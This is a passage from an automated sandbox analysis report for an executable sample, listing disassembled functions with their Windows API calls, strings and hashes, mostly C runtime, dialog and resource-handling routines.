_memcmp.LIBVCRUNTIME ref: 008791EB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 54658c8a14dcad63defc5897ce7738191465559e49ae5c0972b0df843fcb8cd4
Instruction ID: 502860e80f0c6db82776bbdfa721eb2837e5f286e48d6e0f73f359300512d226
Opcode Fuzzy Hash: 54658c8a14dcad63defc5897ce7738191465559e49ae5c0972b0df843fcb8cd4
Instruction Fuzzy Hash: A3219C7161020EBBDB15BB25CC81E2B77ADFB51788B14C128FC6DDA30BE264ED419791

Function 00888FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,008A0EE8,00883E14,008A0EE8,?,?,00883713,00000050,?,008A0EE8,00000200), ref: 00888FA9
_free.LIBCMT ref: 00888FDC
_free.LIBCMT ref: 00889004
SetLastError.KERNEL32(00000000,?,008A0EE8,00000200), ref: 00889011
SetLastError.KERNEL32(00000000,?,008A0EE8,00000200), ref: 0088901D
_abort.LIBCMT ref: 00889023

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ef328d953646b64852b2aa0940b3dd58154226158136886d296335f58bb1b9d3
Instruction ID: c26e8bf03f9612e834f4829545e4475a3d1223929027c46dd3231dd823d4176b
Opcode Fuzzy Hash: ef328d953646b64852b2aa0940b3dd58154226158136886d296335f58bb1b9d3
Instruction Fuzzy Hash: 99F0A436504E11EAD622B72C6C0AB3B2A6AFBD1761B69011AF516D2293EF20D9019716

Function 0087D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0087D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0087D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0087D31D
TranslateMessage.USER32(?), ref: 0087D327
DispatchMessageW.USER32(?), ref: 0087D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0087D33C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: e83eabb197bff300d009837e6a4625cf1ff9f2044662dc6b738605a645fa6dd9
Instruction ID: 6bb1832703e4428e9987552dfb33eed894845a5ce437ac1e507181646ec5c77b
Opcode Fuzzy Hash: e83eabb197bff300d009837e6a4625cf1ff9f2044662dc6b738605a645fa6dd9
Instruction Fuzzy Hash: 69F03C72A01619ABCB206BA1DC4CEDBBF7DFF52391F048012F64AD2154E634C541CBE1

Function 0087C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0087C435

Part of subcall function 008717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0086BB05,00000000,.exe,?,?,00000800,?,?,008785DF,?), ref: 008717C2

Strings

<, xrefs: 0087C41E
MIN, xrefs: 0087C4A3
HIDE, xrefs: 0087C474
MAX, xrefs: 0087C487

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: ee54ea6a57d32931975d841782e495eb3202322ab4fd78ac1232ea48145e37ab
Instruction ID: 4c004ccd93ff4f981743d1389f401bc20b7e618479015c7169e08ba51c691b74
Opcode Fuzzy Hash: ee54ea6a57d32931975d841782e495eb3202322ab4fd78ac1232ea48145e37ab
Instruction Fuzzy Hash: 2C31A276900609AADF25DA98DC55EEEB7BDFB14304F00806AF90CD3194EBB0DAC48B61

Function 0087ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0087ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 0087AE22
DeleteObject.GDI32(00000000), ref: 0087AE54
DeleteObject.GDI32(00000000), ref: 0087AE77

Part of subcall function 00879E1C: FindResourceW.KERNEL32(0087AE4D,PNG,?,?,?,0087AE4D,00000066), ref: 00879E2E
Part of subcall function 00879E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0087AE4D,00000066), ref: 00879E46
Part of subcall function 00879E1C: LoadResource.KERNEL32(00000000,?,?,?,0087AE4D,00000066), ref: 00879E59
Part of subcall function 00879E1C: LockResource.KERNEL32(00000000,?,?,?,0087AE4D,00000066), ref: 00879E64

Strings

], xrefs: 0087AE2A

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: 3ae29fc74dfa19530c8ea1849f5fae9e532757ddc85b21f3bd640c58eab593f0
Instruction ID: bc4f0fac7ddfb700169a754b3d67915671f312d4a99fd50531fc817653511c80
Opcode Fuzzy Hash: 3ae29fc74dfa19530c8ea1849f5fae9e532757ddc85b21f3bd640c58eab593f0
Instruction Fuzzy Hash: C1010033580615A6C720A7689C05E7F7B7AFBC1B52F088012FD48E7299DE72CC1186B2

Function 0087CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0086130B: GetDlgItem.USER32(00000000,00003021), ref: 0086134F
Part of subcall function 0086130B: SetWindowTextW.USER32(00000000,008935B4), ref: 00861365

EndDialog.USER32(?,00000001), ref: 0087CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0087CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0087CD05
SetDlgItemTextW.USER32(?,00000068), ref: 0087CD14

Strings

RENAMEDLG, xrefs: 0087CCA8

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 561fb3a9e2a97a4f7bdd0debc17b0a979f41221d00ad3a60d8bb6504fd16b31d
Instruction ID: 99afe63c7f3c3ba5bd57d0d4d8bc6a0dfebdb3bfe518f45e7e3d381ae89623e5
Opcode Fuzzy Hash: 561fb3a9e2a97a4f7bdd0debc17b0a979f41221d00ad3a60d8bb6504fd16b31d
Instruction Fuzzy Hash: BC0122322842107BD5324B649D08F963B68FB8A702F108019F34AE30E5C6A5A8008B21

Function 008875C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00887573,00000000,?,00887513,00000000,0089BAD8,0000000C,0088766A,00000000,00000002), ref: 008875E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008875F5
FreeLibrary.KERNEL32(00000000,?,?,?,00887573,00000000,?,00887513,00000000,0089BAD8,0000000C,0088766A,00000000,00000002), ref: 00887618

Strings

CorExitProcess, xrefs: 008875ED
mscoree.dll, xrefs: 008875DB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 64a2b9fae7d274414150be9389bf6f8c922d92797b94ced438a082ca0c49cee6
Instruction ID: e1de6e727bcc23f04bf2358fb6644123f11066f6d554ee10d5e94cf94e63e1e9
Opcode Fuzzy Hash: 64a2b9fae7d274414150be9389bf6f8c922d92797b94ced438a082ca0c49cee6
Instruction Fuzzy Hash: 5BF03130A14618BBDB16BB94DC09A9DBFB9FB04715F18406AF805E2160EF358A40CB54

Function 0086EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00870085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008700A0
Part of subcall function 00870085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0086EB86,Crypt32.dll,00000000,0086EC0A,?,?,0086EBEC,?,?,?), ref: 008700C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0086EB92
GetProcAddress.KERNEL32(008A81C0,CryptUnprotectMemory), ref: 0086EBA2

Strings

CryptProtectMemory, xrefs: 0086EB8C
Crypt32.dll, xrefs: 0086EB7C
CryptUnprotectMemory, xrefs: 0086EB98

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 947ffecc9bc63ec1f309a27b635c473c427002af5c043d4ab4ef82433c93bcf5
Instruction ID: 824000c7d39c2b8b0c136b53c10bef9e0588ec053496665d85af90d2b437149b
Opcode Fuzzy Hash: 947ffecc9bc63ec1f309a27b635c473c427002af5c043d4ab4ef82433c93bcf5
Instruction Fuzzy Hash: 85E04F78400B41AECF30AF389848B42BEE4FB15710B08C81EE4E6E3280D6B9D5408B50

Function 00887DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00887E4B
_free.LIBCMT ref: 00887E6B

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ece013000e7e8e893b0ba77094ea32c34f800618cab98734cdea0a7e8bcdcc53
Instruction ID: 88ba6ab96e0945808cec9eac800ed306b7f32809921736825cc56cd52cba139a
Opcode Fuzzy Hash: ece013000e7e8e893b0ba77094ea32c34f800618cab98734cdea0a7e8bcdcc53
Instruction Fuzzy Hash: E3418F32A003049BDB24EF78C881A5EB7B5FF89714B6585A9E519EB241EB31ED01CB81

Function 0088B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0088B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0088B63C

Part of subcall function 00888518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0088C13D,00000000,?,008867E2,?,00000008,?,008889AD,?,?,?), ref: 0088854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0088B662
_free.LIBCMT ref: 0088B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0088B684

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 585fe99fbe8cb5f4e1f7887d58012fc404a4d747049ef8bb1bc7efc46964358a
Instruction ID: 369224a1fd0e5b0e7bf41ff25fddf67801b48e2c15733a302ef2b9920e12bb26
Opcode Fuzzy Hash: 585fe99fbe8cb5f4e1f7887d58012fc404a4d747049ef8bb1bc7efc46964358a
Instruction Fuzzy Hash: 8E0184B2601215BF6321B6BA6C8CC7F6A6DFED6BA1319022ABD04D3111EF60CD0197B5

Function 00889029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,008A0EE8,00000200,0088895F,008858FE,?,?,?,?,0086D25E,?,02CE0F80,00000063,00000004,0086CFE0,?), ref: 0088902E
_free.LIBCMT ref: 00889063
_free.LIBCMT ref: 0088908A
SetLastError.KERNEL32(00000000,00893958,00000050,008A0EE8), ref: 00889097
SetLastError.KERNEL32(00000000,00893958,00000050,008A0EE8), ref: 008890A0

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0893419e8dbb16ba345ef855b778e7a1ed43ee935db45e6318219cb1525e5bf0
Instruction ID: dcb5b8425a83294dc88ccab02a39d4f891675e520c57068aba126a3d53a50fa0
Opcode Fuzzy Hash: 0893419e8dbb16ba345ef855b778e7a1ed43ee935db45e6318219cb1525e5bf0
Instruction Fuzzy Hash: 8001F476505F00AA9332B7786D8593B2A6DFBD137572C012AF556D2292EF60CC019366

Function 0087075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00870A41: ResetEvent.KERNEL32(?), ref: 00870A53
Part of subcall function 00870A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00870A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0087078F
CloseHandle.KERNEL32(?,?), ref: 008707A9
DeleteCriticalSection.KERNEL32(?), ref: 008707C2
CloseHandle.KERNEL32(?), ref: 008707CE
CloseHandle.KERNEL32(?), ref: 008707DA

Part of subcall function 0087084E: WaitForSingleObject.KERNEL32(?,000000FF,00870A78,?), ref: 00870854
Part of subcall function 0087084E: GetLastError.KERNEL32(?), ref: 00870860

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 60dbe874797eee5d9656d841afa83a7cf31938411a1b8cb87402b26c7c603281
Instruction ID: df24545eecd9d855896da98282d9d62a1a5cb0607a6c62b3fb3f3333714f8459
Opcode Fuzzy Hash: 60dbe874797eee5d9656d841afa83a7cf31938411a1b8cb87402b26c7c603281
Instruction Fuzzy Hash: B1019271544B04EBCB22AB69DC85F86BBE9FB48710F04452AF16E82164CB766A44CF90

Function 0088BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0088BF28

Part of subcall function 008884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958), ref: 008884F4
Part of subcall function 008884DE: GetLastError.KERNEL32(00893958,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958,00893958), ref: 00888506

_free.LIBCMT ref: 0088BF3A
_free.LIBCMT ref: 0088BF4C
_free.LIBCMT ref: 0088BF5E
_free.LIBCMT ref: 0088BF70

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2628decb0596dbe3235127b6f2a8d5f0c08d82abe45aa11289483339dc50e4ad
Instruction ID: bd93d45392268940796b261073171cfb9897c6c89aac5e0e34e284986e8e11ff
Opcode Fuzzy Hash: 2628decb0596dbe3235127b6f2a8d5f0c08d82abe45aa11289483339dc50e4ad
Instruction Fuzzy Hash: 46F01D33509605EB8620FB6CEE86C1A77E9FE407107A8484AF108D7921CF30FC808F69

Function 00888060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0088807E

Part of subcall function 008884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958), ref: 008884F4
Part of subcall function 008884DE: GetLastError.KERNEL32(00893958,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958,00893958), ref: 00888506

_free.LIBCMT ref: 00888090
_free.LIBCMT ref: 008880A3
_free.LIBCMT ref: 008880B4
_free.LIBCMT ref: 008880C5

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 349736d54736a8540d1d5251460412e0821e87805dfb6895e2f811055bd3c9b5
Instruction ID: 66c6a7caefd338a84483c9944a451a38bf1c57d07445ae0ae98f0b6462925d0f
Opcode Fuzzy Hash: 349736d54736a8540d1d5251460412e0821e87805dfb6895e2f811055bd3c9b5
Instruction Fuzzy Hash: 01F0177A805525CB9B51BB19BC89C153A75F726720348464AF400D6E73CB3108619FC6

Function 00867574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00867579

Part of subcall function 00863B3D: __EH_prolog.LIBCMT ref: 00863B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00867640

Part of subcall function 00867BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00867C04
Part of subcall function 00867BF5: GetLastError.KERNEL32 ref: 00867C4A
Part of subcall function 00867BF5: CloseHandle.KERNEL32(?), ref: 00867C59

Strings

SeRestorePrivilege, xrefs: 008675D3
SeSecurityPrivilege, xrefs: 008675BE

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 122f668af93280c6292f2a62c35173b096dfa63156bccb54ff2496bb1b939a9b
Instruction ID: facff2c9289e76dfe09e94cfa419c26d7a26fcd1b221e5b82527441356a3de4e
Opcode Fuzzy Hash: 122f668af93280c6292f2a62c35173b096dfa63156bccb54ff2496bb1b939a9b
Instruction Fuzzy Hash: 0231F871904248AEEF10EBA8DC05FEEBB78FF15358F058055F549E7192DB748944CBA2

Function 0087A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0086130B: GetDlgItem.USER32(00000000,00003021), ref: 0086134F
Part of subcall function 0086130B: SetWindowTextW.USER32(00000000,008935B4), ref: 00861365

EndDialog.USER32(?,00000001), ref: 0087A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0087A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0087A4E2

Strings

ASKNEXTVOL, xrefs: 0087A448

Memory Dump Source

